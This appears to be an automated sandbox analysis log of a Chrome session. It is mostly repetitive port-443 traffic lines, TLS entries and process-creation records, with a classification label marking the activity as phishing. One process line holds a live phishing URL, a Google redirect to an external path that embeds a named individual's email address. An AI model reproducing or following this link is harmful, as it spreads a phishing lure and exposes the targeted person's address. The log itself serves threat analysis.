    Source: unknownNetwork traffic detected: HTTP traffic on port 50270 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
    Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknownNetwork traffic detected: HTTP traffic on port 50282 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50247 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
    Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
    Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
    Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50259 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
    Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
    Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
    Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50199 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
    Source: unknownNetwork traffic detected: HTTP traffic on port 50277 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50225 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
    Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
    Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
    Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
    Source: unknownNetwork traffic detected: HTTP traffic on port 50243 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
    Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50197 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
    Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50175 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50213 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
    Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
    Source: unknownNetwork traffic detected: HTTP traffic on port 50255 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
    Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
    Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
    Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50267 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50233 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50279 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50223 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50245 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
    Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
    Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50274 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
    Source: unknownNetwork traffic detected: HTTP traffic on port 50205 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50240 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
    Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
    Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50227 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50252 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
    Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
    Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
    Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
    Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
    Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
    Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
    Source: unknownNetwork traffic detected: HTTP traffic on port 50193 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50259
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50252
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50254
    Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50253
    Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50256
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50255
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50258
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50257
    Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50260
    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50215 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50230 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50263
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50265
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50264
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50267
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50266
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50269
    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50268
    Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50264 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50270
    Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50272
    Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50271
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
    Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50274
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50273
    Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50276
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50275
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50277
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50279
    Source: unknownNetwork traffic detected: HTTP traffic on port 50242 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50281
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50280
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50283
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50282
    Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50203 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50276 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50171 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50285
    Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50287
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
    Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
    Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50168 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50260 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50219 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50237 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50272 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50249 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50207 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50181 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
    Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
    Source: unknownNetwork traffic detected: HTTP traffic on port 50229 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49714 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49717 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49722 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49860 version: TLS 1.2
    Source: classification engineClassification label: mal52.phis.win@23/343@200/702
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=1932,i,10995648027624735946,10571264942194707415,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.com.sg/url?q=p8v7jruqDC0s&rct=p8v7jruqDC0s&sa=t&esrc=p8v7jruqDC0s&source=&cd=p8v7jruqDC0s&uact=&url=amp%2Famandotuvoz.org/service/jkbhwfdhjkng/frederic.delesalle@treezor.com"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=1932,i,10995648027624735946,10571264942194707415,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
